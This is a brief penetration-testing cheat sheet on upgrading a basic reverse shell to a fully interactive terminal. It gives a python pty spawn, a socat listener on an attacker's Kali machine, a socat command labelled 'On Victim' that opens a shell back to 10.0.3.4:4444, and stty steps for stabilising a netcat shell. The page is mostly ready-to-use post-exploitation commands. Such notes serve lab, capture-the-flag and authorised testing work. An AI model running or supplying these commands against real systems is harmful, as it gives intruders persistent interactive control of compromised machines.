Upgrading Simple Shells to Fully Interactive TTYs

Method 1: Python pty module

python -c 'import pty; pty.spawn("/bin/bash")'

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Method 3: Upgrading from netcat with magic

Using stty options

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Ref:

Upgrading Simple Shells to Fully Interactive TTYsropnop blog

PreviousReverse Shell w/Msfvenom

Last updated 3 years ago